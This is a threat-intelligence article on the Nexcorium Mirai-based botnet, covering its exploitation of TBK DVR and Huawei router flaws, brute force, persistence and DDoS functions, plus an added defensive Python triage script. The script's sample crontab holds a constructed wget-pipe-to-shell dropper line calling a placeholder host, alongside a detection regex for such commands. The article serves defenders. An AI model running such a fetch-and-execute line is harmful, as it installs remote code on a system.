Nexcorium Botnet
Cybersecurity investigations reveal that threat actors are actively exploiting security weaknesses in TBK DVR systems and end-of-life TP-Link Wi-Fi routers to deploy variants of the Mirai botnet. These devices, often overlooked in security strategies, present attractive entry points due to outdated firmware, weak configurations, and infrequent patching. Their widespread deployment further amplifies their value as targets in large-scale cyberattacks.
Exploiting Known Vulnerabilities for Initial Access
The campaign targeting TBK DVR devices leverages CVE-2024-3721, a medium-severity command injection vulnerability (CVSS score: 6.3) affecting DVR-4104 and DVR-4216 models. By exploiting this flaw, attackers deliver a Mirai-based payload known as Nexcorium. The vulnerability has been abused before: it was previously used to deploy both Mirai variants and the emerging RondoDox botnet.
In addition, earlier research highlighted a loader-as-a-service ecosystem responsible for distributing multiple malware families, including RondoDox, Mirai, and Morte, by abusing weak credentials and legacy vulnerabilities across routers, IoT devices, and enterprise applications.
Infection Chain and Payload Deployment
The attack sequence begins with the exploitation of the DVR vulnerability to deploy a downloader script. This script identifies the target system’s Linux architecture and executes the appropriate botnet payload. Once activated, the malware signals compromise by displaying a message indicating that control has been established.
Nexcorium mirrors the structural design of traditional Mirai variants, incorporating encoded configuration data, system monitoring mechanisms, and dedicated modules for launching distributed denial-of-service attacks.
Lateral Movement and Persistence Techniques
The malware extends its reach within networks by exploiting additional vulnerabilities, including CVE-2017-17215, targeting Huawei HG532 devices. It also employs brute-force techniques using embedded credential lists to compromise other systems via Telnet access.
Once access is achieved, the malware performs several actions:
- Establishes a shell session on the compromised host
- Configures persistence using crontab and systemd services
- Connects to a remote Command-and-Control server for instructions
- Deletes the original binary to reduce forensic visibility
These steps ensure continued control while minimizing the chances of detection and analysis.
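The persistence and anti-forensics steps listed above leave footprints a responder can look for on a suspected host: scheduled entries that execute from staging directories or pipe a download into a shell, systemd units whose Exec directives do the same, and a running process whose /proc/PID/exe link points at a binary that no longer exists on disk (the trace left when malware deletes its own file). The triage script below is an added example written for this article, not code from the report or from the malware; the indicator heuristics (the list of staging directories, the download-and-execute pattern) and the sample crontab, unit files and /proc layout are constructed assumptions and should be tuned to the environment being examined.

```python
"""Linux host triage for botnet-style persistence and self-deletion.

Added example; heuristics and sample data are constructed assumptions.
"""
import os
import re
import tempfile
from pathlib import Path

# Assumption: legitimate cron jobs and units rarely execute from these dirs.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/shm/")
# Assumption: a scheduled download piped straight into a shell is a dropper.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget|tftp|ftpget)\b.*\|\s*(sh|bash|ash)\b")


def is_suspicious_command(cmd: str) -> bool:
    """True if the command runs from a staging dir or pipes a download to sh."""
    return any(d in cmd for d in STAGING_DIRS) or bool(DOWNLOAD_EXEC.search(cmd))


def suspicious_cron_entries(crontab_text: str) -> list:
    """Scan crontab content (crontab -l, /etc/crontab, cron.d) for flagged lines."""
    flagged = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        # "@reboot cmd" has one schedule field; "m h dom mon dow cmd" has five.
        fields = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        cmd = fields[-1] if len(fields) > 1 else ""
        if is_suspicious_command(cmd):
            flagged.append(line)
    return flagged


def suspicious_systemd_units(unit_texts: dict) -> dict:
    """unit_texts maps unit path -> file contents; returns flagged Exec* lines."""
    hits = {}
    for path, text in unit_texts.items():
        for line in text.splitlines():
            key, _, value = line.partition("=")
            if key.strip().startswith("Exec") and is_suspicious_command(value.strip()):
                hits.setdefault(path, []).append(line.strip())
    return hits


def deleted_exe_processes(proc_root: str = "/proc") -> list:
    """Return (pid, exe_target) for processes whose binary was unlinked.

    The kernel appends " (deleted)" to the /proc/<pid>/exe link target once
    the file backing a running process has been removed from disk.
    """
    results = []
    for entry in os.scandir(proc_root):
        if not entry.name.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(entry.path, "exe"))
        except OSError:
            continue  # kernel thread, exited process, or no permission
        if target.endswith(" (deleted)"):
            results.append((int(entry.name), target))
    return results


# ---- constructed sample data for offline demonstration ----
SAMPLE_CRONTAB = """\
# constructed sample crontab
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
@reboot /tmp/.x/arm7
*/5 * * * * wget -q http://placeholder.example/bins.sh -O- | sh
"""

SAMPLE_UNITS = {
    "/etc/systemd/system/ssh.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
    "/etc/systemd/system/netd.service": (
        "[Unit]\nDescription=constructed sample\n"
        "[Service]\nExecStart=/dev/shm/netd\nRestart=always\n"
    ),
}


def build_fake_proc(root: str) -> None:
    """Constructed /proc layout: one healthy process, one self-deleted binary."""
    for pid, target in ((1, "/sbin/init"), (4242, "/tmp/.x/arm7 (deleted)")):
        d = Path(root) / str(pid)
        d.mkdir(parents=True)
        os.symlink(target, d / "exe")  # dangling link is fine for readlink


def demo_deleted_exe() -> list:
    """Run deleted_exe_processes() against the constructed /proc tree."""
    with tempfile.TemporaryDirectory() as root:
        build_fake_proc(root)
        return deleted_exe_processes(root)


if __name__ == "__main__":
    print("cron:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("systemd:", suspicious_systemd_units(SAMPLE_UNITS))
    print("deleted exe (constructed /proc):", demo_deleted_exe())
    # On a live host, call deleted_exe_processes() with the default "/proc".
```

On a real system the same three functions would be fed `crontab -l` output for each user plus the contents of /etc/crontab and /etc/cron.d, the unit files under /etc/systemd/system, and the live /proc; a hit on the deleted-exe check is worth preserving immediately by copying /proc/PID/exe before the process exits, since the binary is otherwise gone.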
Botnet Capabilities and Operational Impact
After securing persistence, Nexcorium enables attackers to execute a range of DDoS attacks using multiple protocols, including:
- UDP
- TCP
- SMTP
This multi-vector capability allows for flexible and high-impact attack scenarios, making the botnet a significant threat to targeted infrastructure.
Persistent Threat Landscape and Future Risks
Nexcorium exemplifies the evolution of IoT-focused botnets, combining exploit reuse, cross-architecture compatibility, and robust persistence mechanisms. Its integration of known vulnerabilities alongside aggressive brute-force tactics demonstrates a high degree of adaptability.
The continued reliance on default credentials and unpatched devices ensures that IoT ecosystems will remain a critical weak point. Without significant improvements in device security practices, these systems will continue to fuel large-scale botnet operations and disrupt global network stability.